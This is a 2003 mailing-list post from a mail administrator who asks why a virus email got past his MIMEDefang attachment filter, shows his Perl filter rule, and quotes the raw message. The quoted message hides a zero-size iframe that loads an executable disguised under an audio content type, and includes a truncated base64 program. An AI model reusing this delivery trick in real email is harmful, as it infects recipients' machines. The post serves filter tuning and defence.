[Mimedefang] odd filename
Joseph Brennan
brennan at columbia.edu
Tue Jul 1 12:43:00 EDT 2003
Interesting example below. This familiar virusmail gets past
Mimedefang's usual $bad_exts check as in the suggested minimum
filter. In fact I have a specific test to toss these things out
quickly without further analysis, that should have caught this
as it does hundreds of others a day:
if (filter_bad_filename($entity)) {
if ($type =~ /audio/) {
md_log('bad_filename', $fname, $type);
return action_bounce("Bad audio attachment");
}
}
The name= value in the second part looks odd to me.
There is also a third part with the same name= value, which has
a .htm extension. My client (Mulberry) does not render it into
text so I don't know what it says if anything.
Joseph Brennan Columbia University in the City of New York
postmaster at columbia.edu Academic Technologies Group
From: TDOCwebmaster <TDOCwebmaster at mail.state.tn.us>
To: brennan at columbia.edu
Subject: A very new website
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=M8Wq579211
Message-Id: <E19VfId-0001zw-00 at falcon.mail.pas.earthlink.net>
Date: Thu, 26 Jun 2003 15:33:04 -0700
X-Scanned-By: MIMEDefang 2.32 (www . roaringpenguin . com / mimedefang)
--M8Wq579211
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Xk3I2085ut096866 height=3D0 width=3D0>
</iframe>
<FONT>Hello,This is a new website<br>
I wish you would like it.</FONT></BODY></HTML>
--M8Wq579211
Content-Type: audio/x-wav;
name=search_spanel;kw=;sz=120x60;tile=1;ord=10477246[1].exe
Content-Transfer-Encoding: base64
Content-ID: <Xk3I2085ut096866>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
... much stuff deleted ...
--M8Wq579211
Content-Type: application/octet-stream;
name=search_spanel;kw=;sz=120x60;tile=1;ord=10477246[1].htm
Content-Transfer-Encoding: base64
Content-ID: <Xk3I2085ut096866>
PGh0bWw+PGhlYWQ+PHRpdGxlPkNsaWNrIGhlcmUgdG8gZmluZCBvdXQgbW9yZSE8L3RpdGxl
PjwvaGVhZD48Ym9keSBiZ2NvbG9yPSNmZmZmZmYgbWFyZ2lud2lkdGg9MCBtYXJnaW5oZWln
aHQ9MCBsZWZ0bWFyZ2luPTAgdG9wbWFyZ2luPTA+PGEgdGFyZ2V0PSJfdG9wIiBocmVmPSJo
dHRwOi8vYWQuZG91YmxlY2xpY2submV0L2NsaWNrO2g9djJ8MmY2MXwwfDB8JTJhfGs7NTIx
MjU4MTswLTA7MDs2NzA0NTAwOzYtMTIwfDYwOzIzNDU4NjN8MjM0NDExOHwxOzslM2ZodHRw
Oi8vY2xpY2suYXRkbXQuY29tL0VTVS9nby9ydGhsY3BydDAwMTAwMDI5ZXN1L2RpcmVjdC8w
MS8iPjxpbWcgc3JjPSJodHRwOi8vbS5kb3VibGVjbGljay5uZXQvdmlld2FkLzYzOTk0Ny81
LTEyMHg2MHN1bmdsYXNzZXMuZ2lmIiBib3JkZXI9MCBhbHQ9IkNsaWNrIGhlcmUgdG8gZmlu
ZCBvdXQgbW9yZSEiPjwvYT48L2JvZHk+PC9odG1sPj==
--M8Wq579211--
More information about the MIMEDefang
mailing list